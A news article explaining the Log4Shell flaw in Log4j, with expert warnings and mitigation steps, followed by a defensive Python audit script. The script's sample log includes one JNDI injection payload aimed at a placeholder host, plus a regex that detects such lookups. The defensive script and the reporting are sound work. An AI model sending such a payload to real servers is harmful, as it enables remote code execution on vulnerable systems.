A new vulnerability sent shockwaves across the internet over the weekend, sending IT teams scrambling to fix Java servers before they are exploited by ruthless attackers looking for an easy foothold into systems.
It’s colloquially called Log4Shell and one security expert has said it could be “the single biggest vulnerability in the history of modern computing”.
The vulnerability sits within Java logging library Log4j which, when not causing a global cyber security panic, is simply meant to record information about a program on disk for monitoring and debugging.
Except vulnerable versions of Log4j could be easily tricked into leaking sensitive data or running malicious external code thanks to the library’s ‘lookups’ feature, which replaces sequences like ‘${this}’ with data from elsewhere on the server.
Combined with the Java Naming and Directory Interface (JNDI), Log4j lookups can be used by bad actors to make network connections and remotely execute code.
The list of vendors whose products were potentially affected is massive and the US National Vulnerability Database gave Log4Shell – or CVE-2021-44228 by its technical name – the maximum severity score of 10/10.
The Australian Cyber Security Centre (ACSC) warned on Monday that attackers have been actively scanning ports for vulnerable servers.
Servers of the extremely popular video game Minecraft could be attacked simply by sending a message in the game's chat box.
Amit Yoran, CEO of security firm Tenable, described it as “the most critical vulnerability of the last decade”.
“When all of the research is done, we may in fact learn that it is the single biggest vulnerability in the history of modern computing,” he said.
“While details are still emerging, we encourage organisations to update their security controls, assume they have been compromised and activate existing incident response plans.
“The number one priority now is to work with your in-house information security and engineering teams or partner with an organisation that conducts incident response to identify the impact to your business.”
Log4j is in many ways the perfect storm of security flaws: it’s part of a commonly used library, it is relatively easy to exploit, and it was being exploited long before public disclosure.
Matthew Prince, CEO of Cloudflare, said the earliest evidence his company had seen of Log4j exploits was 1 December.
“That suggests it was in the wild at least nine days before publicly disclosed,” he tweeted.
“However, don’t [sic] see evidence of mass exploitation until after public disclosure.”
Within hours of the vulnerability being made public, researchers were seeing it being used to drop malicious software like cryptominers onto unsuspecting machines.
The Randori Attack Team, which runs offensive security operations, warned that security professionals should stay vigilant as the downstream impact of Log4Shell is “difficult to quantify” given the widespread use of Java in enterprise settings.
“We believe there will be an increasing number of vulnerable products discovered in the weeks to come,” the Randori Attack Team said.
“Due to the ease of exploitation and the breadth of applicability, we suspect ransomware actors to begin leveraging this vulnerability immediately.”
Mitigation steps are relatively straightforward: upgrade to Log4j version 2.15.0 and check for indicators of compromise.
But if patching isn’t an option right away, administrators can disable lookups by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
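As an added example (not code from the article or from the Log4j project), a small Python audit applies the two checks above to one host: whether the bundled Log4j is at or above 2.15.0 and, if not, whether either no-lookups switch is set; it also scans constructed sample log lines for the JNDI lookup prefix as an indicator of compromise. It assumes the jar filename carries the version and adds one caveat the article does not state: the no-lookups switch only exists from Log4j 2.10.0 onward.

```python
import re
from typing import Iterable, Mapping, Sequence

FIXED_VERSION = (2, 15, 0)     # release the article names as the fix
NO_LOOKUPS_MIN = (2, 10, 0)    # formatMsgNoLookups is only honoured from 2.10.0 on
PROPERTY = "-Dlog4j2.formatMsgNoLookups"
ENV_VAR = "LOG4J_FORMAT_MSG_NO_LOOKUPS"

# Log4j expands "${...}" lookups inside logged messages; the "jndi:" lookup is
# the one that opens a network connection. Matched case-insensitively here.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Constructed sample access-log lines (203.0.113.0/24 is a documentation range).
SAMPLE_ACCESS_LOG = [
    'GET /index.html "Mozilla/5.0"',
    'GET /login "${jndi:ldap://203.0.113.7:1389/a}"',
    'GET /search?q=${java:version}',
]

def parse_version(text: str) -> tuple:
    """Extract '2.14.1' from a version string or jar name as a comparable tuple."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part) for part in match.groups())

def lookups_disabled(jvm_args: Sequence[str], env: Mapping[str, str]) -> bool:
    """True if either interim mitigation from the article is set to true."""
    for arg in jvm_args:
        name, _, value = arg.partition("=")
        if name == PROPERTY and value.lower() == "true":  # Java parses "TRUE" as true too
            return True
    return env.get(ENV_VAR, "").lower() == "true"

def assess(jar_name: str, jvm_args: Sequence[str], env: Mapping[str, str]) -> str:
    """Classify one JVM as patched, mitigated or vulnerable."""
    version = parse_version(jar_name)
    if version >= FIXED_VERSION:
        return "patched"
    # Releases older than 2.10.0 ignore the switch, so setting it there
    # gives a false sense of safety and the host still counts as vulnerable.
    if version >= NO_LOOKUPS_MIN and lookups_disabled(jvm_args, env):
        return "mitigated"
    return "vulnerable"

def find_jndi_lookups(log_lines: Iterable[str]) -> list:
    """Indicator check: (line number, line) for entries carrying a JNDI lookup."""
    return [(n, line) for n, line in enumerate(log_lines, 1) if JNDI_LOOKUP.search(line)]
```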